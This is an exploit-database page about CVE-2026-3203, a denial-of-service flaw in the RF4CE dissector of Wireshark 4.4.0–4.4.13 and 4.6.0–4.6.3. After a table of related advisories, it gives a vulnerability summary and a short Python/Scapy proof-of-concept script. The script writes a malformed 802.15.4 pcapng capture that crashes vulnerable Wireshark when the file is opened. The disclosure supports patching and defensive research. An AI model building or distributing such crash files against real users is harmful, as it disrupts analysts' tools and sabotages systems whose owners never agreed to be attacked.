Vulners
Lucene search
📄 Wireshark Dissector Crash Denial of Service
| Reporter | Title | Published | Views | Family All 78 |
|---|---|---|---|---|
 | CVE-2026-3203 | 25 Feb 202614:36 | – | attackerkb |
 | AlmaLinux 10 : wireshark (ALSA-2026:9666) | 24 Apr 202600:00 | – | nessus |
| Fedora 44 : wireshark (2026-71154797a5) | 26 Mar 202600:00 | – | nessus |
| Fedora 42 : wireshark (2026-a92f2096cd) | 15 Mar 202600:00 | – | nessus |
| Fedora 43 : wireshark (2026-f7473d3da8) | 15 Mar 202600:00 | – | nessus |
| Wireshark 4.4.x < 4.4.14 Multiple Vulnerabilities (macOS) | 5 Mar 202600:00 | – | nessus |
| Wireshark 4.4.x < 4.4.15 Multiple Vulnerabilities (macOS) | 1 May 202600:00 | – | nessus |
| Wireshark 4.6.x < 4.6.4 Multiple Vulnerabilities (macOS) | 5 Mar 202600:00 | – | nessus |
| Wireshark 4.6.x < 4.6.5 Multiple Vulnerabilities (macOS) | 1 May 202600:00 | – | nessus |
| openSUSE 16 Security Update : wireshark (openSUSE-SU-2026:20685-1) | 10 May 202600:00 | – | nessus |
10
=============================================================================================================================================
| # Title : Wireshark 4.6.0–4.6.3 4.4.0–4.4.13 RF4CE Profile via Malformed IEEE 802.15.4 Dissector Crash – Denial of Service |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.wireshark.org/ |
=============================================================================================================================================
[+] Summary : A vulnerability in the RF4CE Profile protocol dissector of Wireshark versions 4.6.0–4.6.3 and 4.4.0–4.4.13 allows an attacker
to trigger a Denial of Service (DoS) condition by supplying a specially crafted IEEE 802.15.4 packet capture file.
The flaw exists in the handling of malformed RF4CE security-enabled frames. By manipulating security-related fields
and providing inconsistent encrypted payload lengths, the dissector may attempt improper memory operations during
decryption processing (notably in CCM security handling routines).
This can lead to a segmentation fault and application crash when the malicious .
pcapng file is opened in a vulnerable Wireshark version.
An attacker can exploit this vulnerability by distributing a malicious capture file, which, when analyzed, causes Wireshark to terminate unexpectedly.
[+] POC :
from scapy.all import *
from scapy.layers.zigbee import *
output_file = "rf4ce_crash_poc.pcapng"
print(f"[+] Generating Malformed RF4CE Packet to trigger CVE-2026-3203...")
dot154 = Dot154(fcf_frametype=1, fcf_security=1, fcf_panidcomp=1, seqnum=0x42)
dot154_addressing = Dot154Data(dest_panid=0x1234, dest_addr=0x0001, src_addr=0x0002)
rf4ce_nwk = Raw(load=b"\x0c\xff\xff\xff\xff")
malformed_security_payload = Raw(load=b"\x01" * 50)
pkt = dot154 / dot154_addressing / rf4ce_nwk / malformed_security_payload
wrpcap(output_file, pkt)
print(f"[+] File '{output_file}' has been created.")
print(f"[!] Warning: Opening this file in Wireshark 4.6.0-4.6.3 will cause a CRASH.")
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Mar 2026 00:00Current
6Medium risk
Vulners AI Score6
CVSS 3.15.5 - 7.5
EPSS0.00026